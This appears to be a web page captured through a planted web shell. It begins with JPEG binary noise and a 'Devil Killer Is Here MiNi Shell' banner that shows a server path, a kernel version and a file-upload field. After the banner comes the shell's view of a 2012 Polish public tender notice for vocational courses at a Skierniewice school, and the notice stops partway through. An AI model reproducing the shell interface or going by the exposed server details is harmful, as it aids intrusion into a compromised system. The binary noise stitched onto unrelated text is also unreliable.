JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120209/39928-N-2012.html

<p class="kh_header"><b>Skierniewice: Organizacja i prowadzenie kursu obsługi programu AutoCAD, kursu kosztorysowania , kursu przedsiębiorczości, kursu florystyki, kursu  montażu klimatyzatorów, pomp ciepła i systemów solarnych, kursu technologii prac wykończeniowych w ramach projektu Szkoła XXI w. - partnerem na rynku pracy współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Priorytet IX Rozwój wykształcenia i kompetencji w regionach Działanie 9.2   Podniesienie atrakcyjności i jakości szkolnictwa zawodowego. Projekt realizowany jest w ramach Programu Operacyjnego Kapitał Ludzki.</b><br>
<b>Numer ogłoszenia: 39928 - 2012; data zamieszczenia: 09.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Zawodowych Nr 1 , ul. Pomologiczna 6, 96-100 Skierniewice, woj. łódzkie, tel. 46 8336866, faks 46 8336866.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zsz1skierniewice.wikom.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.bip.zsz1skierniewice.wikom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i prowadzenie kursu obsługi programu AutoCAD, kursu kosztorysowania , kursu przedsiębiorczości, kursu florystyki, kursu  montażu klimatyzatorów, pomp ciepła i systemów solarnych, kursu technologii prac wykończeniowych w ramach projektu Szkoła XXI w. - partnerem na rynku pracy współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Priorytet IX Rozwój wykształcenia i kompetencji w regionach Działanie 9.2   Podniesienie atrakcyjności i jakości szkolnictwa zawodowego. Projekt realizowany jest w ramach Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie 6 odrębnych części (zadań): 1. Kurs obsługi programu AutoCAD (60 godzin przy czym 1 godz. = 45 min zajęć i 20 min. przerwy) dla  50 osób ( 3 grupy x 10 uczestników w 2012 r. i 2 gr. w 2013 r. ).2. Kurs Kosztorysowania (40 godzin przy czym 1 godz. = 45 min zajęć i 20 min. przerwy) dla : 40 osób ( 3 gr. po 10 os. w 2012  i 1 gr.  w 2013 r. ).  3.Kurs przedsiębiorczości ( 40 godzin przy czym 1 godz. = 45 min zajęć i 20 min przerwy) dla : 20 osób w 2 grupach liczących po 10 os. ( 2012 - 1 gr. :  2013 - 1 gr. )
4.Kursu florystyki - (50 godzin przy czym 1 godz. = 45 min zajęć i 20 min. przerwy) dla  40 osób w :3 grupy liczące po 10 os. w 2012 i dla  jednej gr. 10 osób w 2013 r, 5. Kurs montażu klimatyzatorów, pomp ciepła i systemów solarnych ( 12 godzin przy czym 1 godz.=45 min zajęć i 20 min przerwy) dla : 11 osób w 2012 r.;  możliwość przeprowadzenia kursu w 2013  r.po ponownej rekrutacji uczestników ).6. Kurs technologii prac wykończeniowych (16 godzin przy czym 1 godz. = 45 min zajęć i 20 min. przerwy) dla : 20 osób ( 1 gr. po 10 os. w 2012  i  1 gr.  w 2013 r. ).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.31.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Warunek zostanie spełniony jeśli Wykonawca przedłoży: a. podpisane oświadczanie o spełnieniu warunków udziału w postępowaniu b. dokument, wydany przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej, potwierdzający posiadanie przez tę instytucję wpisu do Rejestru Instytucji Szkoleniowych. Szkoleniowych (Podmiot ubiegający się o zamówienie musi na czas składania ofert posiadać status instytucji szkoleniowej wydany w roku 2012).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Zamawiający uzna, że Wykonawca posiada niezbędna wiedzę i doświadczenie, jeżeli wykaże się wykonaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, co najmniej pięć usług szkoleniowych o tym samym lub zbliżonym zakresie tematycznym (właściwym dla każdego zadania). Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez wykonawcę oraz na podstawie wykazu wykonanych usług w wyżej opisanym zakresie i załączonych do wykazu potwierdzeń należycie wykonanych usług (w postaci listów referencyjnych, zaświadczeń o przeprowadzeniu usług, umów z potwierdzeniem wykonania usług</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana na podstawie: 
a) oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez wykonawcę, 
b) oświadczenia o posiadaniu potencjału technicznego</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Ocena spełnienia warunku zostanie dokonana na podstawie złożonego przez Wykonawcę wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia. W tabeli wymieniona zostanie kadra dydaktyczna legitymująca się wykształceniem kierunkowym tj. wykształceniem w zakresie zagadnień realizowanych w zamówieniu. Celem udokumentowania posiadanych kwalifikacji należy dołączyć do oferty kopię świadectwa, dyplomu lub zaświadczenia potwierdzonego za zgodność z oryginałem</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Oświadczenie, że Wykonawca nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne, albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie oświadczenia o braku podstaw do wykluczenia (zał. nr 4).  Ocena spełnienia ww. warunku zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie Wykonawców w realizacji prowadzenia kursów na rzecz młodzieży - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy w następujących przypadkach: 1. w przypadku zmiany osób wskazanych w ofercie do wykonywania zamówienia z przyczyn niemożliwych wcześniej do przewidzenia pod warunkiem posiadania przez nich wymaganych kwalifikacji - na wniosek Wykonawcy po uzgodnieniu w formie pisemnej z Zamawiającym i pod warunkiem wyrażenia przez Zamawiającego zgody. 2. w przypadku zmiany terminu realizacji usługi z przyczyn niezależnych od Zamawiającego i/lub Wykonawcy. 3. W przypadku rezygnacji części uczestników; liczba kursów może ulec wtedy zmianie</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zsz1skierniewice.wikom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Zawodowych im. marszałka J. Piłsudskiego w Skierniewicach, ul. Pomologiczna 6,96 - 100 Skierniewice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.02.2012 godzina 10:00, miejsce: Zespół Szkół Zawodowych im. marszałka J. Piłsudskiego w Skierniewicach, ul. Pomologiczna 6,  96 - 100 Skierniewice, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Priorytet IX Rozwój wykształcenia i kompetencji w regionach Działanie 9.2   Podniesienie atrakcyjności i jakości szkolnictwa zawodowego. Projekt realizowany jest w ramach Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs obsługi programu AutoCAD.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs obsługi programu AutoCAD (60 godzin przy czym 1 godz. = 45 min zajęć i 20 min. przerwy) dla  50 osób ( 3 grupy x 10 uczestników w 2012 r. i 2 gr. w 2013 r. ). Uczestnikami/uczestniczkami kursu do których zaplanowano ww. działanie są uczniowie klas technikum w wieku 18 - 19 lat, zamieszkujący w powiecie skierniewickim i na terenie woj. łódzkiego, chcący podnieść swoje umiejętności poprzez nabycie nowych kwalifikacji. Osoby biorące udział w kursie/szkoleniu posiadają wiedzę na poziomie średnim z zakresu obsługi komputera. Kurs powinien obejmować trzy stopnie zaawansowania, po każdym z nich wydawane powinny być certyfikaty ukończenia. Program szkolenia obejmuje zagadnienia z zakresu podstaw i zaawansowanej obsługi programu graficznego AUTOCAD (III stopnie), przygotowuje do samodzielnego wykonywania dokumentacji z wykorzystaniem programu. Program powinien obejmować m.in.: wprowadzenie do środowiska pracy, wyświetlania rysunku, ustawienia rysunku, tworzenie geometrii dwuwymiarowej, techniki konstrukcyjne, wprowadzenie do wymiarowania, kreskowanie, bloki, obrazy rastowe, wymiarowanie w przestrzeni modelu i papieru, wprowadzenie do przestrzeni trójwymiarowej, system współrzędnych 3D, modele bryłowe, wprowadzenie do wizualizacji. Program kursu Wykonawca przedkłada wraz z ofertą -  zał. nr 2. Program powinien zawierać wykaz godzin, zakres merytoryczny zajęć,  ilość stanowisk komputerowych. W trakcie kursu uczestnicy  otrzymują bezpłatnie od Wykonawcy wszystkie niezbędne materiały szkoleniowe. Wykonawca winien zapewnić każdemu uczestnikowi szkolenia osobny komputer z odpowiednim oprogramowaniem.  
Program szkolenia musi być opracowany zgodnie z Rozporządzeniem MEN z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31 poz. 216 z późn. zm.). Po wyborze najkorzystniejszej oferty Wykonawca, którego oferta została uznana za najkorzystniejszą w porozumieniu z Zamawiającym przedkłada wstępny harmonogram realizacji zadania mieszczący się w przedziale czasowym podanym w zał. nr 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie Wykonawców w realizacji prowadzenia kursów na rzecz młodzieży - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs kosztorysowania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs Kosztorysowania (40 godzin przy czym 1 godz. = 45 min zajęć i 20 min. przerwy) dla : 40 osób w  grupach liczących po 10 os.(  3 gr. w 2012 i 1 gr.  w 2013r.)  Uczestnikami/uczestniczkami kursu do których zaplanowano ww. działanie są uczniowie klas technikum w wieku 18 - 19 lat, zamieszkujący w powiecie skierniewickim i na terenie woj. łódzkiego, chcący podnieść swoje umiejętności poprzez nabycie nowych kwalifikacji. Osoby biorące udział w kursie/szkoleniu posiadają wiedzę na poziomie średnim z zakresu obsługi komputera. Program szkolenia powinien obejmować zajęcia teoretyczne i praktyczne. Program powinien zawierać: Instalację i posługiwanie się programem, rodzaje kosztorysów, wpływ programu na wartość końcową kosztorysu, Tworzenie kalkulacji własnych, Sprawdzanie i wydruki kosztorysów i zestawień, Kosztorysy ofertowe i ślepe. Program kursu Wykonawca przedkłada wraz z ofertą - zał. nr 2 . Program powinien zawierać wykaz godzin, zakres merytoryczny zajęć, ilość stanowisk komputerowych W trakcie kursu uczestnicy otrzymują bezpłatnie od Wykonawcy wszystkie niezbędne materiały szkoleniowe. Wykonawca winien zapewnić każdemu uczestnikowi szkolenia osobny komputer z odpowiednim oprogramowaniem. Po wyborze najkorzystniejszej oferty Wykonawca, którego oferta została uznana za najkorzystniejszą w porozumieniu z Zamawiającym przedkłada wstępny harmonogram realizacji zadania mieszczący się w przedziale czasowym podanym w zał. nr 1. Wykonawca zadania zobowiąże się do przeprowadzenia testu ewaluacyjnego przed rozpoczęciem wykonywania usługi, w trakcie trwania kursu/ szkolenia  i na zakończenie oraz ankiety ewaluacyjnej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie Wykonawców w realizacji prowadzenia kursów na rzecz młodzieży - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs przedsiębiorczości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs przedsiębiorczości ( 40 godzin przy czym 1 godz. = 45 min zajęć i 20 min przerwy) dla : 20 osób w 2 grupach liczących po 10 os. ( 2012 - 1 gr. :  2013 - 1 gr. ) Uczestnikami/uczestniczkami kursu, do których zaplanowano ww. działanie są uczniowie klas technikum w wieku 18 - 19 lat, zamieszkujący w powiecie skierniewickim i na terenie woj. łódzkiego, chcący podnieść swoje umiejętności poprzez nabycie nowych kwalifikacji. Osoby biorące udział w kursie/szkoleniu posiadają wiedzę na poziomie średnim z zakresu obsługi komputera. Program szkolenia powinien obejmować zajęcia teoretyczne i praktyczne. Program powinien zawierać treści szkolenia w zakresie: powstawanie małej firmy, w związku z tym formalności związane z utworzeniem danego rodzaju firmy;  zagadnienia prawne związane z funkcjonowaniem małej firmy; opracowanie planu działalności gospodarczej - biznes - plan;  źródła finansowania firmy : leasing i dzierżawca . Franchising;  Organizacja małej firmy - doradztwo w zakresie działalności firmy. Opracowanie planu marketingowego firmy. Promocja produktu i firmy. Marka. Logo. Ocena skuteczności promocji. Rachunek ekonomiczny. Ewidencja sprzedaży w małej firmie. Podstawy obróbki grafiki na użytek działalności marketingowej własnego przedsiębiorstwa ( tworzenie grafik w CorelDraw i edycja zdjęć w PhotoShop). Program kursu Wykonawca przedkłada wraz z ofertą-  
zał. nr 2.  Program powinien zawierać wykaz godzin, zakres merytoryczny zajęć, ilość stanowisk komputerowych ( tworzenie grafik w CorelDraw). W  trakcie kursu uczestnicy otrzymują bezpłatnie od Wykonawcy wszystkie niezbędne materiały szkoleniowe. Wykonawca winien zapewnić każdemu uczestnikowi szkolenia osobny komputer z odpowiednim oprogramowaniem celem właściwego przeprowadzenia kursu.  Po wyborze najkorzystniejszej oferty Wykonawca, którego oferta została uznana za najkorzystniejszą w porozumieniu z Zamawiającym przedkłada wstępny harmonogram realizacji zadania mieszczący się w przedziale czasowym podanym w zał. nr 1. Wykonawca zadania zobowiąże się do przeprowadzenia testu ewaluacyjnego przed rozpoczęciem wykonywania usługi, w trakcie trwania kursu/ szkolenia  i na zakończenie oraz ankiety ewaluacyjnej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie Wykonawców w realizacji prowadzenia kursów na rzecz młodzieży - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs florystyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kursu florystyki - (50 godzin przy czym 1 godz. = 45 min zajęć i 20 min. przerwy) dla : 40 osób w grupach liczących po 10 os. 
( 3 gr. w 2012 i 1 gr. 10  w 2013 r.).   Uczestnikami/uczestniczkami kursu do których zaplanowano ww. działanie są uczniowie klas technikum w wieku 18 - 19 lat, zamieszkujący w powiecie skierniewickim i na terenie woj. łódzkiego, chcący podnieść swoje umiejętności poprzez nabycie nowych kwalifikacji. 
Program szkolenia powinien obejmować zajęcia teoretyczne i praktyczne. Program powinien zawierać: wprowadzenie; teorię barw i kompozycji; narzędzia florysty - materiałoznawstwo; materiał roślinny; florystyka okolicznościowa; sztuka układania kwiatów w naczyniach; dekoracja kwiatów doniczkowych ; artystyczne planowanie prezentów; dekoracja stołów; florystyka ślubna ; florystyka żałobna. Wykonawca winien zapewnić każdemu uczestnikowi wszelkie materiały szkoleniowe oraz  materiał florystyczny.
Po wyborze najkorzystniejszej oferty Wykonawca, którego oferta została uznana za najkorzystniejszą w porozumieniu z Zamawiającym przedkłada wstępny harmonogram realizacji zadania mieszczący się w przedziale czasowym podanym w zał. nr 1 
Wykonawca zadania zobowiąże się do przeprowadzenia testu ewaluacyjnego przed rozpoczęciem wykonywania usługi, w trakcie trwania kursu/ szkolenia  i na zakończenie oraz ankiety ewaluacyjnej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
